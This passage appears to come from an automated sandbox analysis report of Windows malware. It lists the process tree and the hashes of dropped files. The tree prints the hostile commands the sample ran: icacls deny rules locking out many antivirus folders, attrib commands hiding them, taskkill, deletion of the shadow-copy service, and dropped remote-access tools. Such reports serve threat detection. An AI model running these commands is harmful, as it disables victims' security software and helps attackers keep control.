        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:6136
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:5248
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:4632
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
          PID:5440
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
            PID:5948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          PID:5292
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5884
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:5520
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:1456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:4148
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:3140
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5244
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
          PID:5232
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
          PID:5524
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:4608
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5152
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
          PID:5592
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4628
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
          PID:5936
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
          PID:4700
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:812
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          PID:1784
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:2588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:6132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:4040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          PID:5932
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
          PID:4880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5316
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
          PID:4752
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 5 /NOBREAK
            Delays execution with timeout.exe
            PID:4280
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 3 /NOBREAK
            Delays execution with timeout.exe
            PID:5796
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM 1.exe /T /F
            Kills process with taskkill
            PID:5940
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM P.exe /T /F
            Kills process with taskkill
            PID:4724
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:5272
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
          PID:5720
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM iediagcmd.exe /T /F
            Kills process with taskkill
            PID:4904
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5332
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
            PID:5348
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5260
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:1268
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\360\Total Security"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:2552
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360TotalSecurity
            Views/modifies file attributes
            PID:2500
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360safe
            Views/modifies file attributes
            PID:5428
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6056
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5816
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\Avira
            Views/modifies file attributes
            PID:6068
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4564
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Package Cache"
            Views/modifies file attributes
            PID:5744
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5192
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\ESET"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5108
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5692
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\ESET
            Views/modifies file attributes
            PID:5588
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5860
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5652
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5352
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\AVAST Software"
            Views/modifies file attributes
            PID:6044
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5784
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
            Views/modifies file attributes
            PID:5892
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
            Views/modifies file attributes
            PID:4712
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5336
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\AdwCleaner"
            Views/modifies file attributes
            PID:5188
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:6072
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5916
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5760
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "c:\programdata\Malwarebytes"
            Views/modifies file attributes
            PID:5432
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5132
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\MB3Install"
            Views/modifies file attributes
            PID:2896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2596
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\KVRT_Data"
            Views/modifies file attributes
            PID:5696
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5416
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Norton"
            Views/modifies file attributes
            PID:1640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5712
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Avg"
            Views/modifies file attributes
            PID:1132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4588
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\grizzly"
            Views/modifies file attributes
            PID:6032
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4320
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Doctor Web"
            Views/modifies file attributes
            PID:6008
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2032
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Indus"
            Views/modifies file attributes
            PID:5472
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5452
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\WINDOWS\McMwt"
            Drops file in Windows directory
            Views/modifies file attributes
            PID:5792
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:748
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5748
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5780
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
            PID:2416
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            Delays execution with timeout.exe
            PID:2900
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:1040
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
            PID:5840
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5768
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
            PID:5732
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
            Views/modifies file attributes
            PID:1796
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
            Views/modifies file attributes
            PID:4560
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
            Views/modifies file attributes
            PID:6064
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:3192
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:2584
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:360
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      Executes dropped EXE
      PID:728
      • C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        PID:2128
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      Executes dropped EXE
      PID:2412
  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    Checks SCSI registry key(s)
    Modifies data under HKEY_USERS
    PID:4620
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:5040
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:4952
Network
Downloads
  • C:\Program Files\Common Files\System\iediagcmd.exe
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Program Files\Common Files\System\iexplore.exe
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\ProgramData\Microsoft\Check\Check.txt
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\ProgramData\Microsoft\Intel\BLOCK.bat
    MD5: c371470817429692a9a0174abbf7cb19
    SHA1: 7aefbafc8775c9c74b445c713924ae63c28ff692
    SHA256: 0f7298daed85812ee47b4dd45a176c3b5007cfafc31a3013354ac904e05861af
    SHA512: 191a5510e0e26809abc94a0d549a9bd3ad7ae19f362fffb5fcaad9fa6c9f63fd4734771a1476f294b820e4ee90762cec916b49ead88ad986ffa59b3db7b171bf

  • C:\ProgramData\Microsoft\Intel\R8.exe
    MD5: ad95d98c04a3c080df33ed75ad38870f
    SHA1: abbb43f7b7c86d7917d4582e47245a40ca3f33c0
    SHA256: 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
    SHA512: 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\taskhost.exe
    MD5: 5cf0195be91962de6f58481e15215ddd
    SHA1: 7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
    SHA256: 0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
    SHA512: 0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

  • C:\ProgramData\Microsoft\Intel\wini.exe
    MD5: 098d7cf555f2bafd4535c8c245cf5e10
    SHA1: b45daf862b6cbb539988476a0b927a6b8bb55355
    SHA256: 01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a
    SHA512: e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

  • C:\ProgramData\RealtekHD\taskhostw.exe
    MD5: 73ca737af2c7168e9c926a27abf7a5b1
    SHA1: 05fd828fd58a64f25682845585f6565b7ca2fdb2
    SHA256: 99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
    SHA512: de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

  • C:\ProgramData\WindowsTask\MicrosoftHost.exe
    MD5: a74ad3584394b0766ada52191b245013
    SHA1: 6b25f4ba2c86541d4e2e5872a63fa1005373966b
    SHA256: 1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
    SHA512: 5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

  • C:\ProgramData\WindowsTask\audiodg.exe
    MD5: 93e02d14c17fbcc122e1854a570fdc53
    SHA1: a8d460a2651327011e0d3d8cf89c7e6ecfa83b63
    SHA256: fc85ad0cfc03cb9b89f82a16ba72b405a6dd52438e1071bfb38ef93116f9679b
    SHA512: 7caca72160d2446029a56f032b6d982a223760501ab104c2e090f5d6bc8c772d131813e191e6d771dce58cfa75616c1c375cc1e971f548573b95ecf11dfce5de

  • C:\ProgramData\WindowsTask\winlogon.exe
    MD5: ec0f9398d8017767f86a4d0e74225506
    SHA1: 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
    SHA256: 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
    SHA512: d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs
    MD5: 5e36713ab310d29f2bdd1c93f2f0cad2
    SHA1: 7e768cca6bce132e4e9132e8a00a1786e6351178
    SHA256: cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
    SHA512: 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

  • C:\ProgramData\Windows\reg1.reg
    MD5: 0bfedf7b7c27597ca9d98914f44ccffe
    SHA1: e4243e470e96ac4f1e22bf6dcf556605c88faaa9
    SHA256: 7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e
    SHA512: d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

  • C:\ProgramData\Windows\reg2.reg
    MD5: 6a5d2192b8ad9e96a2736c8b0bdbd06e
    SHA1: 235a78495192fc33f13af3710d0fe44e86a771c9
    SHA256: 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
    SHA512: 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

  • C:\ProgramData\Windows\rfusclient.exe
    MD5: b8667a1e84567fcf7821bcefb6a444af
    SHA1: 9c1f91fe77ad357c8f81205d65c9067a270d61f0
    SHA256: dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
    SHA512: ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

  • C:\ProgramData\Windows\rutserv.exe
    MD5: 37a8802017a212bb7f5255abc7857969
    SHA1: cb10c0d343c54538d12db8ed664d0a1fa35b6109
    SHA256: 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
    SHA512: 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\vp8decoder.dll

    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

  • C:\ProgramData\Windows\vp8encoder.dll

    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

    SHA512

    389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

  • C:\ProgramData\Windows\winit.exe

    MD5

    aaf3eca1650e5723d5f5fb98c76bebce

    SHA1

    2fa0550949a5d775890b7728e61a35d55adb19dd

    SHA256

    946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f

    SHA512

    1cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b

  • C:\ProgramData\install\cheat.exe

    MD5

    0d18b4773db9f11a65f0b60c6cfa37b7

    SHA1

    4d4c1fe9bf8da8fe5075892d24664e70baf7196e

    SHA256

    e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673

    SHA512

    a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c

  • C:\ProgramData\install\sys.exe

    MD5

    bfa81a720e99d6238bc6327ab68956d9

    SHA1

    c7039fadffccb79534a1bf547a73500298a36fa0

    SHA256

    222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

    SHA512

    5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

  • C:\Programdata\Install\del.bat

    MD5

    398a9ce9f398761d4fe45928111a9e18

    SHA1

    caa84e9626433fec567089a17f9bcca9f8380e62

    SHA256

    e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

    SHA512

    45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

  • C:\Programdata\RealtekHD\taskhostw.exe

    MD5

    73ca737af2c7168e9c926a27abf7a5b1

    SHA1

    05fd828fd58a64f25682845585f6565b7ca2fdb2

    SHA256

    99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2

    SHA512

    de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

  • C:\Programdata\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

